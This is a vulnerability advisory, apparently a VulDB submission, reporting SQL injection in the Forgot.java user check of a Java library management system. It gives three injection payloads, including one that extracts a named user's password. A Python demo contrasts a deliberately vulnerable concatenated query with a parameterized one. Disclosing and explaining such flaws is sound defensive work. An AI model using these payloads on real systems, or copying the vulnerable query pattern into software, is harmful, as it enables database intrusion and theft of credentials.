Submit #548087: itsourcecode Library Management System Project In Java With Source Code v1.0 SQL Injection

Title: itsourcecode Library Management System Project In Java With Source Code v1.0 SQL Injection
Description: A SQL injection vulnerability has been discovered in Library Management System Java Project (version <= v1.0). The vulnerability exists in the user verification functionality within library_management/src/Library_Management/Forgot.java. Because user input is concatenated directly into SQL queries without parameterization or input validation, attackers can execute arbitrary SQL commands through maliciously crafted inputs.

Impact:
- Unauthorized access to database information
- Exposure of sensitive information (including user passwords)
- Potential database manipulation and corruption

Technical Details:
1. Vulnerability Type: SQL Injection (CWE-89)
2. Affected Version: v1.0 and below
3. Proof of Concept:

```sql
' OR 1=1 LIMIT 1 #
' UNION SELECT 'admin','compromised','pass',4,5 LIMIT 1 #
' UNION SELECT NULL,(SELECT password FROM account WHERE username='jude'),NULL,NULL,null LIMIT 1 #
```

Remediation:
1. Implement prepared statements
2. Add input validation mechanisms
3. Consider using ORM frameworks
4. Apply principle of least privilege
5. Encrypt sensitive data storage

Severity: High

References:
- OWASP SQL Injection Prevention Guide
- CWE-89: SQL Injection
- CERT Oracle Secure Coding Standard for Java
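The concatenation flaw the report describes and the prepared-statement fix it recommends, shown side by side as an added example in Python against an in-memory SQLite table. This is not the project's Java code: the `account` schema, the sample rows and the function names are constructed for illustration, and the tautology input uses SQLite's `--` comment where the report's MySQL payloads use `#`.

```python
import sqlite3

# Constructed sample schema standing in for the project's `account` table.
# Only the table name and the `username`/`password` columns come from the
# report; the rest is an assumption for the demo.
SCHEMA = """
CREATE TABLE account (
    id INTEGER PRIMARY KEY,
    username TEXT NOT NULL,
    password TEXT NOT NULL
);
INSERT INTO account (username, password) VALUES ('jude', 'jude-secret');
INSERT INTO account (username, password) VALUES ('alice', 'alice-secret');
"""


def open_demo_db() -> sqlite3.Connection:
    """Create an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def find_account_vulnerable(conn: sqlite3.Connection, username: str):
    """The flawed pattern: user input concatenated straight into the SQL text.

    A quote inside `username` closes the string literal, so the rest of the
    input is parsed as SQL and can rewrite the WHERE clause (CWE-89).
    """
    sql = "SELECT username, password FROM account WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()


def find_account_safe(conn: sqlite3.Connection, username: str):
    """The fix: a parameterized query (Java's PreparedStatement equivalent).

    The driver passes `username` as a bound value, so quotes and keywords in
    it are compared literally and never reach the SQL parser.
    """
    sql = "SELECT username, password FROM account WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()


if __name__ == "__main__":
    conn = open_demo_db()
    tainted = "' OR 1=1 LIMIT 1 -- "   # constructed tautology input
    print("concatenated :", find_account_vulnerable(conn, tainted))
    print("parameterized:", find_account_safe(conn, tainted))
```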
Source: https://github.com/wlingze/IRify_scan/issues/1
User: lingze (UID 83608)
Submission: 04/01/2025 17:26 (1 year ago)
Moderation: 04/03/2025 21:12 (2 days later)
Status: Accepted
VulDB entry: 303272 [itsourcecode Library Management System 1.0 Forgot.java search txtuname sql injection]
Points: 20
